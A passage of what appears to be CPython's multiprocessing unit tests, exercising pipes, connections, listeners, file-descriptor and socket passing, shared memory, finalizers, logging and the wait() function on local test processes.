manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
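# _echo() treats this empty byte string as its end-of-stream marker
# (see the iter(conn.recv_bytes, SENTINEL) loop below).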
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
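        # After sorting, adjacent entries must either abut within the same
        # arena (stop == nstart) or start a new arena at offset 0, i.e. the
        # free and occupied blocks tile each arena without gaps or overlaps.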
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
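        # At exit only finalizers registered with an exitpriority run:
        # highest priority first and, within a priority, the most recently
        # registered first.  'c' has no exitpriority, so it is never sent.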
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
        self.assertIsNotNone(logger)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
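    # deliver_challenge() sends a random message and expects back an HMAC of
    # it keyed with the authkey; answer_challenge() is the client half.  A
    # bogus reply on either side must raise AuthenticationError.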
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
